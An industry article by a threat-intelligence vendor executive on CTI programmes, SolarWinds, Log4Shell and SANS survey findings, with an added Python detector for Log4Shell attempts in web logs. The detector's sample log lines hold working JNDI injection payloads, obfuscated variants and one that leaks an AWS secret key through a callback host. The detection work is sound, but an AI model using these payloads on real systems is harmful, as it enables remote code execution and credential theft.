Globally, the level of cyber threat to companies is high, and the events of the past year only underline it. Any organization with significant gaps in its cybersecurity capabilities is at risk, and as the threat landscape shifts, as it is doing now, we keep discovering vulnerabilities that have been exploitable for some time. That is why better cyber threat intelligence (CTI) is needed.
The two major cybersecurity events of the last 12 months demonstrate the role of CTI in security operations: the SolarWinds software supply chain compromise (disclosed in December 2020 and still being investigated through early 2021) and the Log4j vulnerability response of late 2021. Both events highlight the need to quickly understand the situation, to put the vast amount of information being shared into context, and to prioritize the resolution of the most significant threats.
Log4j is an open source Java logging library developed under the Apache Software Foundation. Many software developers include it as a dependency to log activity in an application or online service, so it is found in many of the devices and services we use every day. The vulnerability, CVE-2021-44228 ("Log4Shell"), allowed remote code execution: Log4j 2.x expanded lookup expressions such as ${jndi:ldap://...} found in logged strings, so an attacker who could get a string into a log (a User-Agent header, a username, a chat message) could make the server fetch and load a remote class. Lookups such as ${env:...} embedded in the same expression could also leak environment variables, including credentials, through the outbound DNS or LDAP request. The rest is history.
Over the course of a few days, thousands of attacks took place as security teams scrambled to patch, mitigate and contain the impact. Multiple advanced persistent threat groups, as well as cybercriminal groups, were observed targeting Log4j, a reminder of the need to understand as much as possible, in real time, when such incidents occur.
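One practical piece of that real-time understanding is spotting exploitation attempts in your own logs. The following is an added example, not code from the article or from ThreatQuotient: it scans constructed web-server log lines for Log4Shell-style ${jndi:...} payloads, first undoing the URL encoding and nested-lookup obfuscation (${${lower:j}ndi:...}, ${::-j}, ${env:X:-j}) that attackers used to evade naive string matching, and flags payloads that also carry ${env:...} lookups used to exfiltrate secrets. The log lines, IP addresses and helper names are this example's own assumptions.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in web-server logs.

Added example; not from the article or from any vendor. The log lines below
are constructed for illustration, not captured traffic.
"""
import re
import urllib.parse

# Nested lookups that resolve to a literal and are used for obfuscation:
#   ${lower:j} / ${upper:J}  -> j / J
#   ${::-j}, ${env:NOPE:-j}  -> j   (default-value syntax, key missing)
_NESTED = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"      # group 1: lower/upper lookup
    r"|\$\{[^${}]*:-([^${}]*)\}",           # group 2: ':-default' fallback
    re.I,
)

# Resolved ${jndi:<scheme>://<target>} lookup, the actual trigger.
_JNDI = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^}/]+)")

# Lookups that read process/host data; inside a JNDI target they exfiltrate it.
_ENV = re.compile(r"\$\{(?:env|sys|java|hostname|main)[^}]*\}")


def normalize(text: str, max_rounds: int = 8) -> str:
    """URL-decode and collapse nested lookups until the string is stable."""
    cur = text
    for _ in range(max_rounds):
        prev = cur
        cur = urllib.parse.unquote(cur)
        cur = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), cur
        )
        if cur == prev:
            break
    return cur.lower()


def scan(lines):
    """Return one hit per resolved JNDI lookup found in the given log lines."""
    hits = []
    for n, raw in enumerate(lines, 1):
        norm = normalize(raw)
        for m in _JNDI.finditer(norm):
            hits.append({
                "line": n,
                "scheme": m.group(1),
                "target": m.group(2),
                "env_lookup": bool(_ENV.search(norm)),  # credential/host leak attempt
            })
    return hits


# Constructed sample log lines (documentation IP ranges; nothing real).
LOGS = [
    '203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '203.0.113.12 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Armi%3A%2F%2F198.51.100.8%3A1099%2Fc%7D"',
    '203.0.113.13 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:${::-l}${::-d}${::-a}${::-p}://198.51.100.9/d}"',
    '203.0.113.14 - - [10/Dec/2021:12:00:06 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.198.51.100.10/e}"',
]


if __name__ == "__main__":
    for hit in scan(LOGS):
        print(hit)
```

Matching on the normalized string rather than the raw line is the point: four of the five malicious lines above would slip past a literal search for "${jndi:". In production, feed the same function the request URI, User-Agent, Referer and any other attacker-controlled field, and treat any hit as an indicator to pivot on (the callback host is the quickest thing to correlate with CTI feeds).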
Developing CTI capabilities
The good news is that, according to the 2022 SANS CTI survey, many companies are focusing on developing their cyber threat intelligence capabilities. The survey found that more companies are beginning to build this capability, with respondents reporting that their CTI journey has begun. About 200 companies took part in this year's survey, and ThreatQuotient is a key sponsor.
According to the survey, cooperation between CTI teams and operational teams is another important factor in combating attacks and finding vulnerabilities. This year's survey found that this type of cooperation has declined since the switch to remote work in response to the COVID-19 pandemic. Different teams need time and effort to collaborate effectively, and the informal, implicit collaboration that happened naturally before may now be much harder when people are mostly working on their own.
Furthermore, the survey found that although threat intelligence platforms are not yet the main tool used by CTI teams, who still rely largely on "spreadsheets and/or emails", they are important and their adoption is growing. The reasons behind this are varied, but it is definitely an area where vendors can improve the analyst experience by understanding real use cases and by exchanging requirements more openly with practitioners.
Better cooperation and communication are required
Cooperation and communication are crucial in CTI. Over the past two years the transition to remote work, the increase in threats and the heavy workload have eroded some key parts of that collaboration. This can be addressed through both processes and tools.
The survey advises companies to assess whether they have lost communication channels with key stakeholders and to find ways to re-establish those channels. Additional tools may be needed to facilitate cooperation. Many CTI tools, such as ThreatQuotient's Threat Intelligence Platform (TIP), have built-in collaboration functions that teams can explore to see whether they fit into existing processes and workflows.
The conversation about the value of TIPs is not new, and their pros and cons continue to be a topic of discussion.
Going forward, the SANS survey recommends that TIP vendors continue to identify the analytical models that are useful to customers and provide resources for them, keeping in mind that one size rarely fits all in analysis. Offering more than one modeling option allows analysts to apply the right framework to the right situation.
Why high automation is the way to go
Half of the respondents reported that they were using a homegrown CTI platform, that processing was still largely manual, and that only a very small percentage had achieved full automation. The use of automation and integration in commercial and open source CTI management platforms has increased, a positive trend as such platforms mature. However, this is still an area where CTI vendors can better understand their customers' context and needs and improve the analyst experience by extending automation. Given the number of different data formats and the growing volume of data the industry has to deal with, greater automation of processing and correlation is definitely the way to go.
Under-pressure security teams need the ability to automate repetitive, time-consuming, low-level tasks. If a tool can combine that automation with real-time data and context, it will be essential to freeing analysts to investigate high-impact, time-sensitive events. In effect, teams need a balance between automation and manual investigation, and the threat intelligence platform must deliver it using a data-driven approach.
Measuring the effectiveness of your CTI program and tools
Finally, an interesting finding from the survey is that a large percentage of organizations still do not measure the effectiveness of their CTI programs, tools and resources. Measuring the value of an intelligence program allows teams to justify additional resources, new people and new tools, and lets organizations and the industry as a whole move to a higher level of maturity. It calls on both practitioners and vendors to work together to find better and easier ways to measure success in CTI.
Image credit: BeeBright / depositphotos.com
Cyrille Badeau is Vice President of International Sales for ThreatQuotient